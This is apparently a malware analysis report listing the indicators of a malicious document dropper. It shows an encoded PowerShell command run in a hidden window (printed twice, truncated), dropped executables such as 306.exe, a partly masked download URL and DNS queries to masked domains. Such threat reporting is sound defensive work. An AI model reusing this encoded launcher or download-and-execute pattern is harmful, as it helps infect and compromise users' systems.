Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAGMARABBAEEARAAgAD0AIAAnADMAMAA2ACcAOwAkAGMAYwBVAEcAMQBBAGMAQQA9ACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBCAEcAUQAnACwAJwBCAEIAQQAnACkAOwAkAGMARwBBAEEAQQA0AEIAQQA9ACQAZQBuAHYAOgB1AHMAZQByAH...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1548
- %TEMP%\791315.cvr
- %HOMEPATH%\306.exe
- %HOMEPATH%\306.exe
- 'we#####osspalace.com':80
- http://we#####osspalace.com/hlwk49gos/Oi/
- DNS ASK na####nebolango.com
- DNS ASK an##op.xyz
- DNS ASK wo############591-66491-179337.cloudwaysapps.com
- DNS ASK we#####osspalace.com
- DNS ASK re###wtral.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQAGMARABBAEEARAAgAD0AIAAnADMAMAA2ACcAOwAkAGMAYwBVAEcAMQBBAGMAQQA9ACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAJwBCAEcAUQAnACwAJwBCAEIAQQAnACkAOwAkAGMARwBBAEEAQQA0AEIAQQA9ACQAZQBuAHYAOgB1AHMAZQByAH...' (with hidden window)